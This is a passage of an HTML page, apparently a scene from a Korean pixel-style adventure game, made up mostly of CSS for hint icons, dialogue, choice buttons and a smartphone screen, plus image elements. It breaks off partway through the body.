<!DOCTYPE html>
<html>
<title>6floor_end</title>
<style>
@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";overflow:hidden}

	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 7%; left: 20%; display:none; }
	#bx img{ width: 75%; height: auto;  }

	#book { position: absolute; z-index: 99;cursor: pointer;top:2%; right: -1%; animation:start 2s alternate;}
	#book img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}
	#book:hover {opacity: 0.7}

	#map { position: absolute; z-index: 99;cursor: pointer;top:12%; right: -1%; animation:start 2s alternate;}
	#map img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}
	#map:hover {opacity: 0.7}

	#mapc { position: absolute; z-index: 99;cursor: pointer;top:12%; right: -1%; display: none;}
	#mapc img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}
	#mapc:hover {opacity: 0.7}

	#hint { position: absolute; z-index: 99;cursor: pointer;top:22%; right: -1%; animation:start 2s alternate;}
	#hint img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}
	#hint:hover {opacity: 0.7}

	#hint2 { position: absolute; z-index: 99;cursor: pointer;top:22%; right: -1%; animation:start 2s alternate;display: none;}
	#hint2 img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}
	#hint2:hover {opacity: 0.7}

	#mim { position: absolute; z-index: 99;top:7%; right: 78%; animation:start 2s alternate;display: none; cursor: pointer;}
	#mim img{ position: absolute; width: 800px; auto; z-index: 100;}
	#mimi { position: absolute; z-index: 99;top:30%; right: 49.5%;  animation:mimia 2s infinite; display: none;}
	#mimi img{ position: absolute; width: 30px; auto; z-index: 100;}
@keyframes mimia{
			0%{top: 13%;}
			
			50%{top: 15%;}
			100%{top: 13%;}
		}	


/* 힌트영역 */

 #hin1{bottom:71%; right: 50%; position: absolute;display: none; z-index: 99;} 
  #hin1 img{width: auto; height: 40px;animation:hintt 3s alternate; opacity: 0;z-index: 99;}

 #hin2{  bottom: 33%; right: 58%; position: absolute;display: none;z-index: 99;} 
  #hin2 img{width: auto; height: 40px; animation:hintt 3s alternate; opacity: 0; z-index: 99;}

 #hin3{ top: 44%; right:81%; position: absolute; display: none;z-index: 99;} 
  #hin3 img{width: auto; height: 40px; animation:hintt 3s alternate; opacity: 0;  z-index: 99;}

  #hin4{top: 3%; right: 50%; position: absolute;display: none; z-index: 99;} 
  #hin4 img{width: auto; height: 40px;animation:hintt 3s alternate; opacity: 0;z-index: 99;}

 #hin5{ top: 12%; right:81%; position: absolute; display: none;z-index: 99;} 
  #hin5 img{width: auto; height: 40px; animation:hintt 3s alternate; opacity: 0;  z-index: 99;}

@keyframes hintt{
			0%{ opacity: 0;}
			50%{ opacity: 1;}
			100%{ opacity: 0;}
		}
	#logo{top: -5%; left: 47%; position: absolute;}
	#logo img{width: 120px; height: auto;}
	
	#hinttxt{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}

	#yaa{bottom: 11%; font-weight: 5px; font-size: 1em;display:none; left: 43%;font-family: "DungGeunMo";cursor: pointer;}
	#yaa:hover{color: white; }
	#noo{bottom: 11%; font-weight: 5px; font-size: 1em;display:none; left: 55%;font-family: "DungGeunMo";cursor: pointer;}
	#noo:hover{color: white; }


	#poom{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom2{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom3{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom4{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}

	#poom5{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom6{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";z-index: 101;}
	#poom7{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom8{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom9{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom10{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}

	#poom11{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom12{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom13{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom14{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom15{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom16{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom17{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom18{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom19{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom20{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom21{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}
	#poom22{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}

	#nn{bottom: 18%; font-weight: 5px; font-size: 1.5em;display:none; left: 28%;font-family: "DungGeunMo";}
	#nn2{bottom: 18%; font-weight: 5px; font-size: 1.5em;display:none; left: 28%;font-family: "DungGeunMo";}
	#nn3{bottom: 18%; font-weight: 5px; font-size: 1.5em;display:none; left: 28%;font-family: "DungGeunMo";}

	#okk{bottom: 16%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 50px;width: auto; }
#oki{bottom: 16%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oki img{height: 50px;width: auto; }

	#oo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none; animation: tong 2s infinite;}
		#oo img{height: 50px;width: auto; }
	#ooo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#ooo img{height: 50px;width: auto; }
	#oooo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#oooo img{height: 50px;width: auto; }	
	#ooooo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#ooooo img{height: 50px;width: auto; }	
	#ko{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#ko img{height: 50px;width: auto; }
	#koo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#koo img{height: 50px;width: auto; }
	#kooo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#kooo img{height: 50px;width: auto; }
	#koooo{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#koooo img{height: 50px;width: auto; }
	
	#next{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next img{height: 50px;width: auto; }
	#next1{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next1 img{height: 50px;width: auto; }
	#next2{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next2 img{height: 50px;width: auto; }

	#next3{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next3 img{height: 50px;width: auto; }

	#next4{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next4 img{height: 50px;width: auto; }

	#next5{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none; animation: tong 2s infinite;}
		#next5 img{height:50px; width: auto;  }

	#next6{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next6 img{height: 50px;width: auto;  }
	#next7{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next7 img{height: 50px;width: auto;  }
	#next8{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next8 img{height: 50px;width: auto; }
	#next9{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next9 img{height: 50px;width: auto; }
	#next10{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next10 img{height:50px;width: auto;  }
	#next11{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next11 img{height: 50px;width: auto;  }
	#next12{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next12 img{height: 50px;width: auto;  }
	#next13{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next13 img{height: 50px;width: auto;  }
	#next14{bottom: 15%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;animation: tong 2s infinite;}
		#next14 img{height: 50px;width: auto;  }

	#soun { position: absolute; z-index: 99;cursor: pointer;bottom: 18%; right: 15%; display: none; }
	#soun img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}

	#hyun { position: absolute; z-index: 98;top:15%; right: 78%; animation:start 2s alternate;display: none;}
	#hyun img{ position: absolute; width: 700px; auto; z-index: 99;}

	#what3{bottom: 11%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what3:hover{color: white; }
	#what4{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what4:hover{color: white; }
	#what5{bottom: 11%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what5:hover{color: white; }
	#what6{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what6:hover{color: white; }
	#what7{bottom: 11%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what7:hover{color: white; }
	#what8{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what8:hover{color: white; }
-----/*박지*/-----


	#what3 {bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what3:hover{color: white; }

	#what2 {bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer;}
	#what2:hover{color: white; }


	#face1 { position: absolute; z-index: 9;  left: 0%; display: none; bottom: 45.5%; animation:start 2s alternate;}
	#face1 img{ position: absolute; width: 370px; height: auto; z-index: 99;}
	#face2 { position: absolute; z-index: 9;  left: -3%; bottom: 50.5%; display: none; animation:start 2s alternate; }
	#face2 img{ position: absolute; width: 420px; height: auto; z-index: 99;}
	#face3 { position: absolute; z-index: 9;  left: 0%; bottom: 49.5%; animation:start 2s alternate; display: none;}
	#face3 img{ position: absolute; width: 370px; height: auto; z-index: 99;}
	#face4 { position: absolute; z-index: 9;  left: 0%; bottom: 45.5%; animation:start 2s alternate; display: none;}
	#face4 img{ position: absolute; width: 370px; height: auto; z-index: 99;}

	#chang { position: absolute; z-index: 9;  left: 0%; display: none; bottom: 45.5%; animation:start 2s alternate;}
	#chang img{ position: absolute; width: 370px; height: auto; z-index: 99;}

	#sigar { position: absolute; z-index: 99;cursor: pointer; bottom:70%; left: 55%;}
	#sigar img{ position: absolute; width: 300px; height: 100px;z-index: 99;cursor: pointer;}
	
	#bit { position: absolute; z-index: 99; bottom:30%; left: 35%;}
	#bit img{ position: absolute; width: 50px; z-index: 99;}

	#turn{bottom: 8%; left: 50%; position: absolute; animation: backk 3s alternate; }
	#turn img{width: 40px; height: auto;cursor: pointer; }

	#toto{top: 50%; left: 92%; position: absolute; animation: heree 3s alternate; }
	#toto img{width: 40px; height: auto;cursor: pointer; }
	#tata{top: 40%; left: 10%; position: absolute; animation: dd 3s alternate; }
	#tata img{width: 40px; height: auto;cursor: pointer; }

	#dd { position: absolute; z-index: 99;cursor: pointer; top:3%; right: 20%; display: none;}
	#dd img{ position: absolute; width: auto; height: 50px;z-index: 99;cursor: pointer;}
	#dd2 { position: absolute; z-index: 99;cursor: pointer; top:3%; right: 20%;display: none;}
	#dd2 img{ position: absolute; width: auto; height: 50px;z-index: 99;cursor: pointer;}


	#tt { position: absolute; z-index: 99; top: 8%; left: 37%; animation: tra 2s alternate; display: none;cursor: pointer; }
	#tt img{ position: absolute; z-index: 99; width: 500px; height: auto; }	

	#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; top: 60px;}


#tat2{bottom: 55%; font-weight: 800; font-size: 2em; left:   30%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
	#inn{bottom: 30%; font-weight: 600; font-size: 1.3em; right:  0%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
#tat{bottom: 55%; font-weight: 800; font-size: 2em; left:   30%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
	#info { position: absolute; z-index: 99;cursor: pointer; top:3%; right: 22%; animation: infom 5s alternate; display: none;}
	#info img{ position: absolute; width: auto; height: 40px;z-index: 99;cursor: pointer;}
#pho { position: absolute; z-index: 999; top:40%;left: 18%; animation: tam 3s alternate;display: none;}
#pho img{ position: absolute; width: auto; height: 400px;z-index: 99; }

#too { position: absolute; z-index: 99; top:30%; left: 25%; animation:tam 2s alternate;display: none; cursor: pointer;}
#too img{ position: absolute; width: 700px; height: auto; z-index: 99;}




/* Parent Container */
#content_img7{display: none;
position: absolute;
 width: 80px;
 height: 500px;
 float: left;
 margin-right: 10px;
  bottom:22%; left: 15%;
  margin-right: 10px;
}

/* Child Text Container */
#content_img7 div{
 position: absolute;
 bottom:10%; left: 10%;
 background: #262621;
 color: #a2a09a;
 font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
 opacity: 0;
 visibility: hidden;
 -webkit-transition: visibility 0s, opacity 0.5s linear; 
 transition: visibility 0s, opacity 0.5s linear;
 margin-bottom: 5px;
 line-height:150%;
  font-size:0.9em;
}

/* Hover on Parent Container */
#content_img7:hover{
 cursor: pointer;
}

#content_img7:hover div{
 width: 220px;
 visibility: visible;
 opacity: 0.7; 
 position: absolute;
 padding: 8px 15px;
border-radius: 5px;
bottom:42%; left: -85%;
}



/* 616 */
#design{
position: absolute;
 width: 90px;
 height: 40px;
 float: left;
 margin-right: 10px;
  top:13%; left: 15%;
  margin-right: 10px;
}

/* Child Text Container */
#design div{
 position: absolute;
 bottom:10%; left: 10%;
 background: #262621;
 color: #a2a09a;
 font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
 opacity: 0;
 visibility: hidden;
 -webkit-transition: visibility 0s, opacity 0.5s linear; 
 transition: visibility 0s, opacity 0.5s linear;
 margin-bottom: 5px;
 line-height:150%;
  font-size:0.9em;
}

/* Hover on Parent Container */
#design:hover{
 cursor: pointer;
}

#design:hover div{
 width: 140px;
 visibility: visible;
 opacity: 0.7; 
 position: absolute;
 padding: 8px 15px;
border-radius: 5px;
bottom:82%; left: -55%;
}



/* Parent Container */
#content_img{
position: absolute;
 width: 80px;
 height: 500px;
 float: left;
 margin-right: 10px;
  bottom:22%; left: 15%;
  margin-right: 10px;
}

/* Child Text Container */
#content_img div{
 position: absolute;
 bottom:10%; left: 10%;
 background: #262621;
 color: #a2a09a;
 font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
 opacity: 0;
 visibility: hidden;
 -webkit-transition: visibility 0s, opacity 0.5s linear; 
 transition: visibility 0s, opacity 0.5s linear;
 margin-bottom: 5px;
 line-height:150%;
  font-size:0.9em;
}

/* Hover on Parent Container */
#content_img:hover{
 cursor: pointer;
}

#content_img:hover div{
 width: 220px;
 visibility: visible;
 opacity: 0.7; 
 position: absolute;
 padding: 8px 15px;
border-radius: 5px;
bottom:42%; left: -85%;
}


/* 교수밈 */
#content2_img{
position: absolute;
 width: 80px;
 height: 40px;
 float: left;
 margin-right: 10px;
 top: 2%; right: 48%;
  margin-right: 10px;
}

/* Child Text Container */
#content2_img div{
 position: absolute;
 bottom:20%; right: 30%;
 background: #262621;
 color: #a2a09a;
 font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
 opacity: 0;
 visibility: hidden;
 -webkit-transition: visibility 0s, opacity 0.5s linear; 
 transition: visibility 0s, opacity 0.5s linear;
 margin-bottom: 5px;
 line-height:150%;
  font-size:0.9em;
}

/* Hover on Parent Container */
#content2_img:hover{
 cursor: pointer;
}

#content2_img:hover div{
 width: 170px;
 visibility: visible;
 opacity: 0.7; 
 position: absolute;
 padding: 8px 15px;
border-radius: 5px;
bottom:-80%; left: -60%;
}


/* 분주 */
#content5_img{
position: absolute;
 width: 400px;
 height: 300px;
 float: left;
 margin-right: 10px;
  top: 10%; right: 35%;
  margin-right: 10px;
}

/* Child Text Container */
#content5_img div{
 position: absolute;
 bottom:20%; right: 0%;
 background: #262621;
 color: #a2a09a;
 font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
 opacity: 0;
 visibility: hidden;
 -webkit-transition: visibility 0s, opacity 0.5s linear; 
 transition: visibility 0s, opacity 0.5s linear;
 margin-bottom: 5px;
 line-height:150%;
  font-size:0.9em;
}

/* Hover on Parent Container */
#content5_img:hover{
 cursor: pointer;
}

#content5_img:hover div{
 width: 220px;
 visibility: visible;
 opacity: 0.7; 
 position: absolute;
 padding: 8px 15px;
border-radius: 5px;
bottom:50%; left: 20%;
}


/*거울 */
#content4_img{
position: absolute;
 width: 10%; height: auto;
 float: left;

 bottom: 26%; left: 35.5%; animation:start 2s alternate;
 
}

/* Child Text Container */
#content4_img div{
 position: absolute;
 bottom:0%; left: 85%;
 background: #262621;
 color: #a2a09a;
 font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
 opacity: 0;
 visibility: hidden;
 -webkit-transition: visibility 0s, opacity 0.5s linear; 
 transition: visibility 0s, opacity 0.5s linear;
 margin-bottom: 5px;
 line-height:150%;
  font-size:0.9em;
}

/* Hover on Parent Container */
#content4_img:hover{
 cursor: pointer;
}

#content4_img:hover div{
 width: 130px;
 visibility: visible;
 opacity: 0.7; 
 position: absolute;
 padding: 8px 15px;
border-radius: 5px;
bottom:30%; left: -1%;
}
@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }
@keyframes tong{
			0%{bottom: 14%;}
			50%{bottom: 15%;}
			100%{bottom: 14%;}
		}
@keyframes start{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}

@keyframes inin{
			0%{top: 61%;}
			
			100%{top: 58%;}
		}
@keyframes backk{
			0%{bottom: 11%;}
			
			100%{bottom: 8%;}
		}
@keyframes ne{
			0%{bottom: 17%;}
			
			100%{bottom: 15%;}
		}				
@keyframes dd{
			0%{left:13% ;}
			
			100%{left:10%;}
		}		
@keyframes heree{
			0%{left:89% ;}
			
			100%{left:92%;}
		}
@keyframes tra{
			0%{opacity: 0}
			
			100%{opacity: 1}
		}
@keyframes fron{
			0%{top: 63%;}
			
			100%{top: 60%;}
		}		
@keyframes infom
			{0%{opacity: 0;}
			30%{opacity: 1;}
			60%{opacity: 0;}
			100%{opacity: 1;}
		}
	@keyframes tam{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}
h1 { 
	color: #484535;
	 
	width: 26ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.5s steps(15, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}
h2 { 
	color: #484535;
	 
	width:70ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.8s steps(30, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h3 { 
	color: #484535;
 
	width: 50ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(25, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h4 { 
	color: #484535;
 
	width: 18ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.5s steps(10, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h5 { 
	color: #484535;
 
	width: 40ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.9s steps(20, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h6 { 
	color: #484535;
 
	width: 45ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.8s steps(22, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h7 { font-weight:bold;
	color: #484535;
 
	width:75ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.8s steps(30, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h8 { font-weight:bold;
	color: #484535;
 
	width: 53ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 0.8s steps(22, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}


h10{color: #484535;position: absolute;z-index: 3; font-weight: 800;}
p { 
	color: black;
	position: absolute;
	
	width: 53ch;
	margin: 2em 1em;
	}
a3 { color: black;
	position: absolute;
	width: 53ch;
	margin: 21em 8em;
	cursor: pointer;
	}

a3:hover{ color: white;
	position: absolute;	
	width: 53ch;
	margin: 21em 8em;
	}

/*스마트폰*/

a5 { 
	font-weight:bold;
	color: #0d0a06;
	bottom: -1%;
	position: absolute;
	}

	#smart { position: absolute; z-index: 99;cursor: pointer;top:32%; right: -1%; animation:start 2s alternate;}
	#smart img{ position: absolute; width: 80px; height:auto; z-index: 99;cursor: pointer;}
	#smart:hover {opacity: 0.7}

	#tada { position: absolute; z-index: 99;top:4%; right: 78%; animation:start 2s alternate; display: none;preload;}
	#tada img{ position: absolute; width: 700px; auto; z-index: 99; preload;}
	#tada2 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada2 img{ position: absolute; width: 700px; auto; z-index: 99;}
	#tada3 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada3 img{ position: absolute; width: 700px; auto; z-index: 99;}
	#tada4 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada4 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada5 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada5 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada6 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada6 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada7 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada7 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada8 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada8 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada9 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada9 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada10 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada10 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#tada11 { position: absolute; z-index: 99;top:4%; right: 78%; display: none;}
	#tada11 img{ position: absolute; width: 700px; auto; z-index: 99;}

	#logo{top: -5%; left: 47%; position: absolute;}
	#logo img{width: 120px; height: auto;}
	
	#flashlight{bottom: 13%; font-weight: 5px; font-size: 1em;display:none; left: 23%;font-family: "DungGeunMo";}


	#soun { position: absolute; z-index: 99;cursor: pointer;bottom: 80%; right: 54%;  display: none;}
	#soun img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun2 { position: absolute; z-index: 99;cursor: pointer;bottom: 80%; right: 48%;display: none; }
	#soun2 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun3 { position: absolute; z-index: 99;cursor: pointer;bottom: 80%; right: 43%; display: none; }
	#soun3 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun4 { position: absolute; z-index: 99;cursor: pointer;bottom: 80%; right: 37%; display: none; }
	#soun4 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun5 { position: absolute; z-index: 99;cursor: pointer;bottom: 72%; right: 54%; display: none; }
	#soun5 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun6 { position: absolute; z-index: 99;cursor: pointer;bottom: 72%; right: 48%; display: none; }
	#soun6 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun7 { position: absolute; z-index: 99;cursor: pointer;bottom: 72%; right: 43%;display: none;  }
	#soun7 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}
/* 하단 */
	#soun8 { position: absolute; z-index: 99;cursor: pointer;bottom: 36%; right: 54%; display: none; }
	#soun8 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun9 { position: absolute; z-index: 99;cursor: pointer;bottom: 36%; right: 48%; display: none; }
	#soun9 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun10 { position: absolute; z-index: 99;cursor: pointer;bottom: 36%; right: 43%; display: none; }
	#soun10 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#soun11 { position: absolute; z-index: 99;cursor: pointer;bottom: 36%; right: 37%; display: none; }
	#soun11 img{ position: absolute; width: 50px; height:50px; z-index: 101;cursor: pointer;}

	#musi {display: none; }
	#music { position: absolute; z-index: 99;cursor: pointer;bottom: 4%; left: 25%; display: none;}
	#music img{ position: absolute; width: 10px; height:10px; z-index: 101;cursor: pointer;}
	#music2 { position: absolute; z-index: 99;cursor: pointer;bottom: 4%; left: 25%;display: none; }
	#music2 img{ position: absolute; width: 10px; height:10px; z-index: 101;cursor: pointer;}

	#foo{bottom: 16%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none; animation: tong 2s infinite;}
		#foo img{height: 50px;width: auto; }

	#call { position: absolute; z-index: 99;cursor: pointer;bottom:60%; right: 55%; display: none;}
	#call img{ position: absolute; width: 300px; height:30px; z-index: 101;cursor: pointer;}




	/*대답*/

	#ch{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer; z-index: 100;}
	#ch:hover{color: white; }

	#choose{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 48%;font-family: "DungGeunMo";cursor: pointer;z-index: 100;}
	#choose:hover{color: white; }

	#ch3{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer; z-index: 100;}
	#ch3:hover{color: white; }

	#choose3{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 52%;font-family: "DungGeunMo";cursor: pointer;z-index: 100;}
	#choose3:hover{color: white; }

	#ch4{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";cursor: pointer; z-index: 100;}
	#ch4:hover{color: white; }

	#choose4{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 52%;font-family: "DungGeunMo";cursor: pointer;z-index: 100;}
	#choose4:hover{color: white; }


</style>

<head>
	<title></title>
</head>

<body>

	<div id="container">

	<div id="smart">
		<img src="smart.png">
	</div>

	<div id="music">
		<img src="stopi.png">
	</div>
	<div id="music2">
		<img src="go.png">
	</div>

	<div id="foo">
		<img src="okk.png">
	</div>
	<div id="tada">
		<img src="tada.gif">
	</div>
	<div id="tada2">
		<img src="tata2.gif">
	</div>
	<div id="tada4">
		<img src="base.png">
	</div>
	<div id="tada3">
		<img src="cell.png">
	</div>
	<div id="tada5">
		<img src="cloud.png">
	</div>
	<div id="tada6">
		<img src="message.png">
	</div>
	<div id="tada7">
		<img src="call2.png">
	</div>
	<div id="tada8">
		<img src="tim.png">
	</div>
	<div id="tada9">
		<img src="gall.png">
	</div>
	<div id="tada10">
		<img src="ser2.png">
	</div>
	<div id="tada11">
		<img src="juso.png">
	</div>
 <!-- 힌트영역 -->
	<div id="soun">
		<img src="blank.png">
	</div>
	<div id="soun2">
		<img src="blank.png">
	</div>
	<div id="soun3">
		<img src="blank.png">
	</div>
	<div id="soun4">
		<img src="blank.png">
	</div>
	<div id="soun5">
		<img src="blank.png">
	</div>
	<div id="soun6">
		<img src="blank.png">
	</div>	
